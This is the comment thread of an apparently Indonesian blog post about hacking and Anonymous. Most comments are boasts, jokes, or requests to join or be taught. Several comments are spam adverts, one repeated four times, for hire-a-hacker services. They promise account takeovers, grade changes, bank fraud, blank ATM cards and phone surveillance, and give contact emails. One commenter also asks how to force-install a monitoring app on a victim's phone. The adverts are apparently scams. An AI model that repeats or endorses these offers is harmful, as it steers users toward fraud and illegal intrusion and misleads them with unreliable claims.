Lol...hacking facebook pake social enginering.modal itu saja lo udah bisa hacking facebook baca komen tentang hack facebook banyak amat gimana cara nya aplikasi apa.... lol.... anonymous itu bukan software lol. anonymous itu OS kayak sejenis windows,linux dll. please dech ya kalo belum ngerti itu pelajari dulu jangan komen yang mmebuat ketawa.hacking gak ada yang bisa ngajari. belajar dari diri sendiri. kunci nya cuman satu dari gw.Belajar program c+ itu udah paling cupu. komen yang bermanfaat,kalo udah bermanfaat baru komen. jangan tanya2 gak jelas.

Unknown mengatakan...

satu lagi,anda tidak perlu tau saya siapa.cuman kunci dari saya: biasakan kalo memank niat menjadi hacker jangan pake software itu bukan hacker.tp TOLOL...pake otak belajar pemograman nulis code dan semuanya.belajar semua sendiri.hacking tidak ada yang bisa mengajari kecuali u semua udah mengerti dan sesama hacker cuman saling berbagi informasi dan share ilmu yang sudah sama2 di mengerti. masalah megajari??? berharap aja sampe bumi kiamat tidak akan ada. karena itu privasi.dan sering2 kumpul di MIRC kalo tanya dimana alamt nya... cari sendiri punya otak kan??? mau jadi hacker kan??? kenapa harus tanya sana sini. cari tau sendiri.itu aja 2 yang bisa membantu. lain nya cari info sering online dunia maya. salah satu nya Mirc.SEE YA... kalo udh jago bisa ketemu ya suatu saat.dan kalo mau komen yang bermanfaat jangan cuman bisa nya tanya ini dan itu.

Unknown mengatakan...

Saya ingin bergabung dengan anonim bukan saya ingi jahat tapi hanya ingin melindungi privasi saya...bagaimana caranya min?

tomtore.com mengatakan...

anonymous itu tidak mempunyai grup.jadi anda tidak bisa bergabung dengan anonymous. kenapa saya bisa bilang begitu,sekarang saya tanya pada anda,anda anonymous bukan???jawabanya adalah iya. kenapa saya bisa bilang iya. karena kita semua ini yang sudah menjelajahi internet itu adalah anonymous.anonymous it dari orang2 yang tidak di kenal satu sama lain. jadi saling berkumpul menjadi satu. makanya itu anonymous itu tidak ada group. jika pun ada yang bilang kalo ada grup anonymous itu cuman HOaX. kenapa saya bilang hoax.buktinya ada tuh anonymous group di beredaran internet. lah kan udah saya bilang mereka tidak mengenal satu sama lain. dan merek cuman kenal lewat chat. bahkan attack hacking pun juga cuman lewat chat komunikasi. maka dari itu alasan di sebut grup anonymous. yang arti kata lain. kita semua ini tidak mengenal satu sama lain. jikalau pingin tau pembelajaran ini dan itu software ini itu dan itu bisa berbicara dan share lewat satu sama lain. dan sering2 kumpul di forum2 hacker. cari di site forum hacker. tapi syarat harus bisa inggris setidak nya. karena bahasa umum inggris bukan indonesia. thanks

tomtore.com mengatakan...

itulah arti dari anonymous yang sebenar nya.semisal anda dan saya tidak kenal tapi kita sering komunikasi dan hanya kenal lewat chat terus di lain sisi ada yang gabung ikutan chat maka kenal satu sama lain nya lagi akhir nya kita mendirikan sebuah grup chat maka dari itu lah yang di sebut anonymous grup. jadi intinya grup anonymous yang asli itu tidak ada. karena sebutan itu ya seperti yang sudah saya jelaskan di atas. kita semua ini anonymous sudah berselancar di dunia maya ya kita semua ini anonympus beda nya anonymous hacker itu mereka yang suka keindahan komputer mempelajari sistem2 komputer sedangkan anonymous yang biasa ya biasanya hanya mencari informasi di website contoh seperti di ggoogle ,sosmed lain nya. itu bedanya dua arti kata itu tapi yang sebenar nya itu sama2 anonymous sebutanya. thanks.

Unknown mengatakan...

Bang mohon bantuan nya.......laptop tmen sy kena virus wanna cry!!!!

irvan mengatakan...

jual aja belik baru lagi
simpel kan wkwkwk :D

Unknown mengatakan...

Cuman kasih saran aja
Kalo ga mampu untuk belajar jadi hacker anonymous anda bisa menjadi activist anonymous bro,tapi kebanyakan orang luar negeri :v,seperti melakukan sesuatu di jalanan,membantu tunawisma,dll pada tanggal 5 nov (terinspirasi oleh V for Vendetta)
Expect us!

Rio albam mengatakan...

Pingin sih

Unknown mengatakan...

pengin menjadi anonymous tapi ilmu sedit kaya baru belajar tentang komputer

Unknown mengatakan...
Komentar ini telah dihapus oleh pengarang.
Unknown mengatakan...

ini kata"nya persis kaya yang di youtube yah...
cuman beda bahasa..
hahahaha

Unknown mengatakan...

https://m.youtube.com/watch?v=nTGYdQX7gQc

syahdan al hasan mengatakan...

Semua orang mempunyai ke ahlian masing2,saya sudah mempelajari sistem teknologi selama 1thn tetapi tidak ada hasil

Unknown mengatakan...

Saya juga ingin buka warkop aj

Unknown mengatakan...

Saya juga ingin buka warkop aj

NAFASAT QABEEL mengatakan...

MENDAPATKAN HASIL DALAM WAKTU SATU JAM UNTUK SEMUA JENIS EMAIL HACK ...
Halo semuanya, apakah Anda membutuhkan layanan hacking?
Kemudian hubungi> NOBLEHACKER284@GMAIL.COM untuk layanan hacking terbaik.
Diperingatkan, kebanyakan dari hacker yang disebut ini adalah penipu,
Saya tahu bagaimana sebenarnya hacker bekerja, mereka tidak pernah mengiklankan diri mereka sedemikian rupa sehingga mereka selalu diskrit.
Saya telah berkali-kali melakukan scammed karena putus asa untuk mencari bantuan mendesak untuk mengubah nilai sekolah saya,
Akhirnya teman saya mengenalkan saya pada sekelompok hacker handal yang bekerja dengan penuh kebijaksanaan dan segera memberikannya,
Mereka melakukan segala macam hacking mulai dari;
-Mengamankan situs pribadi / perusahaan
-Sales of Blank kartu ATM.
-Games hacking
-hack ke akun email dan telusuri lokasi email
- Semua akun media sosial,
- Database sekolah untuk menghapus atau mengubah nilai,
-Retrieval file / dokumen yang hilang
**** kartu iTune kode hack
-DUIs
Catatan dan sistem perusahaan,
-Bank account, account Paypal, Bitcoin dan Onecoin account.
Kartu kredit hack
-Kredit skor hack
-Monitor setiap telepon dan alamat email
-hack alamat IP
+ Ketuk panggilan orang lain dan pantau percakapan mereka.
    Dengan menyewa layanan mereka, Anda akan mendapatkan garansi 30 hari gratis. Itu berarti
Bahwa jika beberapa password diubah dalam kerangka waktu ini sejak saat anda
Menerimanya, mereka akan mendapatkannya lagi secara gratis.
     *** KONTAK> NOBLEHACKER284@GMAIL.COM

Unknown mengatakan...

Gua bisa gabung ke anonymous sekarang?

Unknown mengatakan...

J o i n pako

Unknown mengatakan...

Ale pako

Unknown mengatakan...

Ale pako

Unknown mengatakan...

J o i n pako

Unknown mengatakan...

Dari 0 modal 0.minta masukan,,,?
Mulai dr mn saya harus bljar,,,?

Unknown mengatakan...

Cuman bs bhs indonesia,maklum dr kawasan rendah

Unknown mengatakan...

Ajarin dong...

Unknown mengatakan...

Pertayaan dari anonymous jawaban nya apa harus sama seperti itu?

Unknown mengatakan...
Komentar ini telah dihapus oleh pengarang.
Unknown mengatakan...
Komentar ini telah dihapus oleh pengarang.
Unknown mengatakan...

This lol.. no one know where we are...
Hey anons adalah satu klompok yg mempunyai hubungan tersendiri.. tidak mudah untuk bergabung... Setiap anon pada regionalny telah di atur..

Cuma tepatny dikatakan tidak ada pemimpin.. tetapi sebenarnya setiap region ada pengurusnya..

Bagaimana suatu kelompok bisa kerja sama team yg baik jika kelompok itu tidak terorganisir...

Kalian tidak akan pernah mengetahui yg sebenarnya karna kami adalah anonymous...

Unknown mengatakan...

You just idiot hacker dude.. we will takes down you

Unknown mengatakan...

Saya ingin belajar tentan semuanya

xxx mengatakan...

saya ingin menjadi seorang hacker, bisahkan saya tau dasarnya

Unknown mengatakan...

Aku seorang hacker jg loh..
Tapi hacker mesin..������

Muhammad S'k mengatakan...
Komentar ini telah dihapus oleh pengarang.
Muhammad S'k mengatakan...

Hari ini saya berkhayal lagi, siapa saja adakah ada seorang yang mau membantu saya menyelesaikan masalah ini?. Jadi seperti ini khayalan saya. "Tadi saya menginstal aplikasi anti maling di Android lewat playstore. Setelah aplikasi tersebut terinstall dan saya memasukan data seperti E-Mail dll, saya bisa mengakses ponsel saya dari sebuah website menggunakan perangkat lain. Dengan bermodalkan sinyal internet tentunya. Akhirnya saya bisa melakukan apapun terhadap Android saya tersebut (Pembajakan terhadap ponsel sendiri sebagai uji coba/menggunakan aplikasi anti maling sebagai alat sadap dan blokir). Kesimpulan-Nya, apakah Aplikasi tersebut bisa dimodifikasi, agar bisa di Install secara paksa kepada Android target/korban?. Bisakah aplikasi tersebut di kirim semisal di selinapkan lewat gambar atau video. Sekarangkan rata-rata semua Smartphone terkoneksi lewat internet siang dan malam. Aplikasi chat tertentu bisa mengakses kamera depan dan belakang? Kenapa sejauh ini saya tidak pernah menemukan sebuah aplikasi paksaan untuk melakukan anu-anu untuk sekedar menambah wawasan kedewasaan? Saya tidak kuasa ketika harus berhadapan dengan banyaknya tools pada Linux, atau menggunakan search engine lain setelah google! Saya tidak sanggup bila harus mencari celah pada sebuah cookie kalau nggak salah itu namanya, Bagaimana cara nya menaklukan sebuah Smartphone kemudian mendidiknya agar bisa bekerja lebih baik lagi?". Anyone...

Unknown mengatakan...

Play on the game' ,

Unknown mengatakan...

Ajri aku dong bang

FFGYT mengatakan...

Jangan Hack Aku Ya...

Anonim mengatakan...

Halo semuanya, Butuh layanan hacking? hubungi SPIDERHACKERS95@GMAIL.COM
 Diperingatkan, kebanyakan dari hacker yang disebut di sini adalah penipu, saya tahu bagaimana sebenarnya peretas bekerja, mereka tidak pernah mengiklankan diri mereka sedemikian rupa sehingga mereka selalu diskrit. Saya telah berkali-kali melakukan scammed karena putus asa untuk menemukan bantuan mendesak untuk mengubah nilai sekolah saya, akhirnya teman saya mengenalkan saya pada sekelompok hacker handal yang bekerja dengan penuh kebijaksanaan dan segera memberikannya, mereka melakukan segala macam tipuan mulai;
- Penjualan kartu ATM Blank.
- Nilai universitas atau sekolah berubah
- Rekening bank hack dan transfer dana
- Menghapus catatan kriminal hack
- Facebook hack, Twitters hack
- akun email hack, gmail, yahoomail, hotmail dll
- Skype hack
-Whatsapp hack
- Database hack
- Word Press Blogs hack
- komputer individu hack
- Kontrol perangkat dari jarak jauh
- Akun Paypal Terperinci hack
- Android & iPhone Hack dll.
Tapi mereka membantu saya;
- Mengubah nilai sekolah saya
- Hacked my cheating ass pacar email facebook
- Sebagian besar dari semuanya, mereka membantu saya dengan transfer uang Western Union dan saya melacak dan mengkonfirmasi uangnya sebelum saya membayar biaya mereka. Saya telah menjadikan mereka sebagai hacker permanen saya dan Anda juga dapat menikmati layanan mereka.
Anda dapat menghubungi mereka di SPIDERHACKERS95@GMAIL.COM untuk layanan hacking dan juga berusaha menyebarkan kabar baik tentang bagaimana mereka membantu Anda.

Anonim mengatakan...

Halo semuanya, Butuh layanan hacking? hubungi SPIDERHACKERS95@GMAIL.COM
 Diperingatkan, kebanyakan dari hacker yang disebut di sini adalah penipu, saya tahu bagaimana sebenarnya peretas bekerja, mereka tidak pernah mengiklankan diri mereka sedemikian rupa sehingga mereka selalu diskrit. Saya telah berkali-kali melakukan scammed karena putus asa untuk menemukan bantuan mendesak untuk mengubah nilai sekolah saya, akhirnya teman saya mengenalkan saya pada sekelompok hacker handal yang bekerja dengan penuh kebijaksanaan dan segera memberikannya, mereka melakukan segala macam tipuan mulai;
- Penjualan kartu ATM Blank.
- Nilai universitas atau sekolah berubah
- Rekening bank hack dan transfer dana
- Menghapus catatan kriminal hack
- Facebook hack, Twitters hack
- akun email hack, gmail, yahoomail, hotmail dll
- Skype hack
-Whatsapp hack
- Database hack
- Word Press Blogs hack
- komputer individu hack
- Kontrol perangkat dari jarak jauh
- Akun Paypal Terperinci hack
- Android & iPhone Hack dll.
Tapi mereka membantu saya;
- Mengubah nilai sekolah saya
- Hacked my cheating ass pacar email facebook
- Sebagian besar dari semuanya, mereka membantu saya dengan transfer uang Western Union dan saya melacak dan mengkonfirmasi uangnya sebelum saya membayar biaya mereka. Saya telah menjadikan mereka sebagai hacker permanen saya dan Anda juga dapat menikmati layanan mereka.
Anda dapat menghubungi mereka di SPIDERHACKERS95@GMAIL.COM untuk layanan hacking dan juga berusaha menyebarkan kabar baik tentang bagaimana mereka membantu Anda.

Anonim mengatakan...

Halo semuanya, Butuh layanan hacking? hubungi SPIDERHACKERS95@GMAIL.COM
 Diperingatkan, kebanyakan dari hacker yang disebut di sini adalah penipu, saya tahu bagaimana sebenarnya peretas bekerja, mereka tidak pernah mengiklankan diri mereka sedemikian rupa sehingga mereka selalu diskrit. Saya telah berkali-kali melakukan scammed karena putus asa untuk menemukan bantuan mendesak untuk mengubah nilai sekolah saya, akhirnya teman saya mengenalkan saya pada sekelompok hacker handal yang bekerja dengan penuh kebijaksanaan dan segera memberikannya, mereka melakukan segala macam tipuan mulai;
- Penjualan kartu ATM Blank.
- Nilai universitas atau sekolah berubah
- Rekening bank hack dan transfer dana
- Menghapus catatan kriminal hack
- Facebook hack, Twitters hack
- akun email hack, gmail, yahoomail, hotmail dll
- Skype hack
-Whatsapp hack
- Database hack
- Word Press Blogs hack
- komputer individu hack
- Kontrol perangkat dari jarak jauh
- Akun Paypal Terperinci hack
- Android & iPhone Hack dll.
Tapi mereka membantu saya;
- Mengubah nilai sekolah saya
- Hacked my cheating ass pacar email facebook
- Sebagian besar dari semuanya, mereka membantu saya dengan transfer uang Western Union dan saya melacak dan mengkonfirmasi uangnya sebelum saya membayar biaya mereka. Saya telah menjadikan mereka sebagai hacker permanen saya dan Anda juga dapat menikmati layanan mereka.
Anda dapat menghubungi mereka di SPIDERHACKERS95@GMAIL.COM untuk layanan hacking dan juga berusaha menyebarkan kabar baik tentang bagaimana mereka membantu Anda.

Anonim mengatakan...

Halo semuanya, Butuh layanan hacking? hubungi SPIDERHACKERS95@GMAIL.COM
 Diperingatkan, kebanyakan dari hacker yang disebut di sini adalah penipu, saya tahu bagaimana sebenarnya peretas bekerja, mereka tidak pernah mengiklankan diri mereka sedemikian rupa sehingga mereka selalu diskrit. Saya telah berkali-kali melakukan scammed karena putus asa untuk menemukan bantuan mendesak untuk mengubah nilai sekolah saya, akhirnya teman saya mengenalkan saya pada sekelompok hacker handal yang bekerja dengan penuh kebijaksanaan dan segera memberikannya, mereka melakukan segala macam tipuan mulai;
- Penjualan kartu ATM Blank.
- Nilai universitas atau sekolah berubah
- Rekening bank hack dan transfer dana
- Menghapus catatan kriminal hack
- Facebook hack, Twitters hack
- akun email hack, gmail, yahoomail, hotmail dll
- Skype hack
-Whatsapp hack
- Database hack
- Word Press Blogs hack
- komputer individu hack
- Kontrol perangkat dari jarak jauh
- Akun Paypal Terperinci hack
- Android & iPhone Hack dll.
Tapi mereka membantu saya;
- Mengubah nilai sekolah saya
- Hacked my cheating ass pacar email facebook
- Sebagian besar dari semuanya, mereka membantu saya dengan transfer uang Western Union dan saya melacak dan mengkonfirmasi uangnya sebelum saya membayar biaya mereka. Saya telah menjadikan mereka sebagai hacker permanen saya dan Anda juga dapat menikmati layanan mereka.
Anda dapat menghubungi mereka di SPIDERHACKERS95@GMAIL.COM untuk layanan hacking dan juga berusaha menyebarkan kabar baik tentang bagaimana mereka membantu Anda.

«Terlama ‹Lebih tua   1 – 200 dari 330   Lebih baru› Terbaru»

Posting Komentar

◄ Posting Baru Posting Lama ►
 

Followers

Best Patner

Instagram

Site Info

W3 Directory - the World Wide Web Directory
cacinx-ams.blogspot.com Webutation

Copyright © 2013. Education Science Computer - All Rights Reserved B-Seo Versi 5 by Cacinx ams